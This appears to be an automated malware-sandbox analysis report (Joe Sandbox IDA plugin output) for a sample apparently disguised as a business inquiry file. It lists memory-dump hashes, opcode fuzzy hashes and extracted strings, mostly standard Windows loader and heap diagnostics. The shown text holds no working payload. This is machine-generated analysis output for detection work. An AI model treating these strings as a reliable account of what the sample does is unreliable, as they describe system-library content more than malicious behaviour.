                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                • API String ID: 0-1325123933
                                                • Opcode ID: a20662df35c1776b29e990cc004c399f32b7662c9f8f7a2cd00f8a400fe98d9b
                                                • Instruction ID: 92652317e06a6436740ff66b0027bb9de31356c5c73a0b6957046de2471d773c
                                                • Opcode Fuzzy Hash: a20662df35c1776b29e990cc004c399f32b7662c9f8f7a2cd00f8a400fe98d9b
                                                • Instruction Fuzzy Hash: D37248715583429FD721DF28C850A6FBBE9FBC8704F84492DFA859B250E770D905CBA2
                                                Strings
                                                • 8, xrefs: 015752E3
                                                • Critical section address., xrefs: 01575502
                                                • undeleted critical section in freed memory, xrefs: 0157542B
                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0157540A, 01575496, 01575519
                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015754CE
                                                • Invalid debug info address of this critical section, xrefs: 015754B6
                                                • Critical section address, xrefs: 01575425, 015754BC, 01575534
                                                • Critical section debug info address, xrefs: 0157541F, 0157552E
                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01575543
                                                • Thread identifier, xrefs: 0157553A
                                                • Address of the debug info found in the active list., xrefs: 015754AE, 015754FA
                                                • double initialized or corrupted critical section, xrefs: 01575508
                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015754E2
                                                • corrupted critical section, xrefs: 015754C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                Strings
                                                • @, xrefs: 0157259B
                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01572409
                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01572498
                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015724C0
                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01572412
                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015725EB
                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01572624
                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015722E4
                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01572602
                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0157261F
                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01572506
                                                Similarity
                                                • API ID:
                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                Similarity
                                                • API ID:
                                                • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                Similarity
                                                • API ID:
                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                Similarity
                                                • API ID:
                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                Similarity
                                                • API ID:
                                                • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                Similarity
                                                • API ID:
                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                Strings
                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01588A67
                                                • VerifierDlls, xrefs: 01588CBD
                                                • HandleTraces, xrefs: 01588C8F
                                                • VerifierDebug, xrefs: 01588CA5
                                                • VerifierFlags, xrefs: 01588C50
                                                • AVRF: -*- final list of providers -*- , xrefs: 01588B8F
                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01588A3D
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                Similarity
                                                • API ID:
                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                Similarity
                                                • API ID:
                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                Similarity
                                                • API ID:
                                                • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                Similarity
                                                • API ID:
                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                Similarity
                                                • API ID:
                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                Strings
                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01559A2A
                                                • apphelp.dll, xrefs: 014F6496
                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015599ED
                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01559A01
                                                • LdrpInitShimEngine, xrefs: 015599F4, 01559A07, 01559A30
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01559A11, 01559A3A
                                                Similarity
                                                • API ID:
                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                Strings
                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0157219F
                                                • SXS: %s() passed the empty activation context, xrefs: 01572165
                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01572180
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015721BF
                                                • RtlGetAssemblyStorageRoot, xrefs: 01572160, 0157219A, 015721BA
                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01572178
                                                Similarity
                                                • API ID:
                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                Strings
                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 015781E5
                                                • LdrpInitializeImportRedirection, xrefs: 01578177, 015781EB
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01578181, 015781F5
                                                • Loading import redirection DLL: '%wZ', xrefs: 01578170
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0153C6C3
                                                • LdrpInitializeProcess, xrefs: 0153C6C4
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                Similarity
                                                • API ID:
                                                • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                APIs
                                                  • Part of subcall function 01542DF0: LdrInitializeThunk.NTDLL ref: 01542DFA
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01540BA3
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01540BB6
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01540D60
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01540D74
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                • String ID:
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                Strings
                                                • SsHd, xrefs: 0151A885
                                                • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 01567D03
                                                • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 01567D56
                                                • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 01567D39
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                Strings
                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0153855E
                                                • @, xrefs: 01538591
                                                • LdrpInitializeProcess, xrefs: 01538422
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01538421
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                Strings
                                                • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 015654ED
                                                • HEAP[%wZ]: , xrefs: 015654D1, 01565592
                                                • HEAP: , xrefs: 015654E0, 015655A1
                                                • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 015655AE
                                                Similarity
                                                • API ID:
                                                • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                Strings
                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015721D9, 015722B1
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015722B6
                                                • SXS: %s() passed the empty activation context, xrefs: 015721DE
                                                • .Local, xrefs: 015328D8
                                                Similarity
                                                • API ID:
                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                Strings
                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0157342A
                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01573456
                                                • RtlDeactivateActivationContext, xrefs: 01573425, 01573432, 01573451
                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01573437
                                                Similarity
                                                • API ID:
                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                Strings
                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0156106B
                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01561028
                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01560FE5
                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015610AE
                                                Similarity
                                                • API ID:
                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                Strings
                                                • apphelp.dll, xrefs: 01522462
                                                • LdrpDynamicShimModule, xrefs: 0156A998
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0156A9A2
                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0156A992
                                                Similarity
                                                • API ID:
                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                Strings
                                                • HEAP[%wZ]: , xrefs: 01513255
                                                • HEAP: , xrefs: 01513264
                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0151327D
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                Strings
                                                • HEAP[%wZ]: , xrefs: 01501712
                                                • HEAP: , xrefs: 01501596
                                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01501728
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: $@
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: FilterFullPath$UseFilter$\??\
                                                Strings
                                                • LdrpCheckModule, xrefs: 0156A117
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0156A121
                                                • Failed to allocated memory for shimmed module list, xrefs: 0156A10F
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                Strings
                                                • Failed to reallocate the system dirs string !, xrefs: 015782D7
                                                • minkernel\ntdll\ldrinit.c, xrefs: 015782E8
                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 015782DE
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                Strings
                                                • PreferredUILanguages, xrefs: 015BC212
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 015BC1C5
                                                • @, xrefs: 015BC1F1
                                                Similarity
                                                • API ID:
                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                Strings
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01584888
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01584899
                                                • LdrpCheckRedirection, xrefs: 0158488F
                                                Similarity
                                                • API ID:
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                Similarity
                                                • API ID:
                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                Strings
                                                • LdrpInitializationFailure, xrefs: 015820FA
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01582104
                                                • Process initialization failed with status 0x%08lx, xrefs: 015820F3
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: #%u
                                                Similarity
                                                • API ID:
                                                • String ID: @$@
                                                Strings
                                                • LdrResSearchResource Enter, xrefs: 0150AA13
                                                • LdrResSearchResource Exit, xrefs: 0150AA25
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                Similarity
                                                • API ID:
                                                • String ID: `$`
                                                Strings
                                                • Failed to retrieve service checksum., xrefs: 0155EE56
                                                • ResIdCount less than 2., xrefs: 0155EEC9
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                Similarity
                                                • API ID:
                                                • String ID: @$MUI
                                                Strings
                                                • kLsE, xrefs: 01500540
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0150063D
                                                Similarity
                                                • API ID:
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                Strings
                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0150A2FB
                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0150A309
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Cleanup Group$Threadpool!
                                                Similarity
                                                • API ID:
                                                • String ID: MUI
                                                Similarity
                                                • API ID:
                                                • String ID: P`owRbow
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                Similarity
                                                • API ID:
                                                • String ID: PATH
                                                Similarity
                                                • API ID: __aullrem
                                                • String ID:
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 1ef0a52434ec9bae91444c461ccfa6b2c315336967f7d2a808e4414bdcef47d3
                                                • Instruction ID: d893f796d22822495679fb1418c800bcdbb639a04222e7f4123a48b27c8faa79
                                                • Opcode Fuzzy Hash: 1ef0a52434ec9bae91444c461ccfa6b2c315336967f7d2a808e4414bdcef47d3
                                                • Instruction Fuzzy Hash: 1BA17E31A0425A67DF77CAA4CC51BFEABE5BF94394F04449AFE466F2C1C6B0DA408B50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: d6655866390b886a3072fe6130a210e5933eb1328105fa043d0d665bb0556a2d
                                                • Instruction ID: 5015ec81e774e0a6a6710b62b7fd4db993575ff681944a30ece4de1a1fa3331f
                                                • Opcode Fuzzy Hash: d6655866390b886a3072fe6130a210e5933eb1328105fa043d0d665bb0556a2d
                                                • Instruction Fuzzy Hash: 90A116306003696ADF358E69CCC0BFE2BA4BF96754F080499AE879F2C3CB74C945CA50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 64a2dd29485083537a64cdd91c1c015e9ffad06b57049e623ae88e5aaf3d9235
                                                • Instruction ID: 6b000ed296c829add92f6e17ec5df6a7f61dc24f97eff8a8f57caeb8ad9537b1
                                                • Opcode Fuzzy Hash: 64a2dd29485083537a64cdd91c1c015e9ffad06b57049e623ae88e5aaf3d9235
                                                • Instruction Fuzzy Hash: 38915272A4021AAFEB21EB95CD85FAE7BB8FF59B54F140055F600BF190D774A904CBA0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: ae2cc0065da7a8de04a003a50649d6dcab6c3fa09053c22ab168fe3804509215
                                                • Instruction ID: 356ae2eca3718a380d0ee0a38c71bf3cfc37f556cc49cfae3101a7d0f1468249
                                                • Opcode Fuzzy Hash: ae2cc0065da7a8de04a003a50649d6dcab6c3fa09053c22ab168fe3804509215
                                                • Instruction Fuzzy Hash: B191AE3294060AAFDB22ABA4DC55FAFBBB9FF85740F500029F500AB250E734A901CB90
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalTags
                                                • API String ID: 0-1106856819
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: .mui
                                                • API String ID: 0-1199573805
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: EXT-
                                                • API String ID: 0-1948896318
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: #
                                                • API String ID: 0-1885708031
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryName
                                                • API String ID: 0-215506332
                                                Strings
                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0158895E
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                • API String ID: 0-702105204
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 23f8decfc9e584b4d7d8fc59ec412b89f20e0b8bff8903a084d267bb1893188e
                                                • Instruction ID: 38f8ee7948702ce56f495630ede3029d3947911be84cab21950a4675ae05f49c
                                                • Opcode Fuzzy Hash: 23f8decfc9e584b4d7d8fc59ec412b89f20e0b8bff8903a084d267bb1893188e
                                                • Instruction Fuzzy Hash: 42F1C472E005269BDB29CE6CC5A05BEFBF5BF54210B194269D856EF380E734EE41CB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                • Instruction ID: 8caeac54bddd4d27562c8eefbea2cf895931ac904d0af4c1d5c3b983668be45a
                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                • Instruction Fuzzy Hash: 83F14172E0022A9BDF19CF99D590BAEBBF5BF45710F048529E905EF284E774D841CBA0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd086c6ddae00804a4f2d0592b44cf699c22e39399456857b64f407947607d6f
                                                • Instruction ID: 7d5ade80e011b029346c92619e348353ca82f4146d5f78e34c95a9b9b63093bb
                                                • Opcode Fuzzy Hash: dd086c6ddae00804a4f2d0592b44cf699c22e39399456857b64f407947607d6f
                                                • Instruction Fuzzy Hash: 6AE1D135A042869FDB25CFACD4817FEBBF1BF48310F18841AD496AF281D675A989CB50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b12616084b57dc487b660da68a4ecef9db4801d62159fad8196d070af7b2587e
                                                • Instruction ID: 41873c6b16e154bd4b35635d2440092c1f264cabf9a5a183d9f17a0ee646d97f
                                                • Opcode Fuzzy Hash: b12616084b57dc487b660da68a4ecef9db4801d62159fad8196d070af7b2587e
                                                • Instruction Fuzzy Hash: 30D10371A0060E8BDF05CF68C841AFEB7F2BF89314F188169D955EB241E739E905CB61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ed324aa4679f641ccd2a2bfa834deec9cf11c49d8c348b9dbce1054357b4db93
                                                • Instruction ID: 0d9131402934a3a1194f830eb4b5ec7e6497d94cc01f9b4461374dd161f5dfe2
                                                • Opcode Fuzzy Hash: ed324aa4679f641ccd2a2bfa834deec9cf11c49d8c348b9dbce1054357b4db93
                                                • Instruction Fuzzy Hash: 83E19F71608342CFC716CF68C490A6EBBE0FF89314F15896DE9958B391EB31E915CB92
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
